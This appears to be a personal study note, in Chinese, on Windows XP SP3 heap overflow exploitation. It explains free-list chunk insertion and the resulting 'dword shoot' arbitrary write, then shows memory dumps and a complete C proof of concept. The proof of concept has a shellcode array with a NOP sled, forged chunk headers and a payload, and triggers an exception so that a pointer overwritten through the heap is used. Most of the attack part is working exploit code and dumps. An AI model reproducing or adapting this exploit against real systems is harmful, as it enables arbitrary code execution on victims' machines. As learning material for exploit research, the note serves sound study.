只是笔记························································
下面环境为 XP sp3 VC6.0 RELEASE
#include <windows.h> int main() { HLOCAL h1 = 0, h2 = 0; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,0x10); return 0; }
xp 下面介绍 CHUNK插入链表的过程:
执行完 HeapCreate 后
开始拆卸链表:
接着开始关键部分:
到这里 新chunk的插入部分的关键部分也就结束了··············
总结:
[新chunk->flink] = 旧chunk->flink
[新chunk->blink] = 旧chunk->blink
[ 旧chunk->blink->flink ] = 新chunk
[旧chunk->blink] = 新chunk
实际上是造成了一个向任意地址写入固定值得 漏洞 dword shoot
下面是正常情况反映················································
003A0688 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A0698 2D 01 03 00 00 10 00 00 78 01 3A 00 78 01 3A 00 -....x:.x:.
003A06A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A0698 03 00 03 00 8F 01 08 00 00 00 00 00 00 00 00 00 ..?.........
003A06A8 00 00 00 00 00 00 00 00 2A 01 03 00 00 10 00 00 ........*....
003A06B8 78 01 3A 00 78 01 3A 00 00 00 00 00 00 00 00 00 x:.x:.........
003A06C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[0x003a0638+4] = 0x0012ffe4
[0x0012ffe4] = 0x003a06b8
[0x003a06eb+4] = 0x003906b8
003A0688 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 悙悙悙悙悙悙悙悙
003A0698 10 01 10 00 99 99 99 99 EB 06 3A 00 EB 06 3A 00
.櫃櫃?:.?:.
003A06A8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 悙悙悙悙悙悙悙悙
003A06B8 90 90 90 90 90 90 90 90 EB 31 90 90 90 90 90 90 悙悙悙悙?悙悙悙
003A06C8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 悙悙悙悙悙悙悙悙
003A06D8 90 90 90 90 90 90 90 90 90 90 90 11 01 10 00 99 悙悙悙悙悙?.
003A06E8 99 99 99 8C 06 3A 00 E4 FF 12 00
003A06B8 /EB 06 jmp X003A06C0 003A06BA |3A00 cmp al,byte ptr ds:[eax] 003A06BC |E4 FF in al,0xFF 003A06BE |1200 adc al,byte ptr ds:[eax] 003A06C0 EB 31 jmp X003A06F3 //而这个的EB 31 是我们故意设置的跳转
#include <stdio.h> #include <windows.h> char shellcode[]= "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x10x01x10x00x99x99x99x99" "xEBx06x3ax00xEBx06x3ax00" "x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "xEBx31x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" "x90x90x90x90x90x90x90x90x90x90x90" "x11x01x10x00x99x99x99x99x8Cx06x3ax00xb4xFFx12x00" "x90x90x90x90" "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C" "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53" "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B" "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95" "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59" "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A" "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75" "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03" "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB" "x53" "x68x64x61x30x23" "x68x23x50x61x6E" "x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"; void main() { HLOCAL h1,h2; HANDLE hp; hp = HeapCreate(0,0x1000,0x10000); // __asm int 3 h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16); memcpy(h1,shellcode,300); h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16); int zero=0; zero=1/zero; printf("%d",zero); }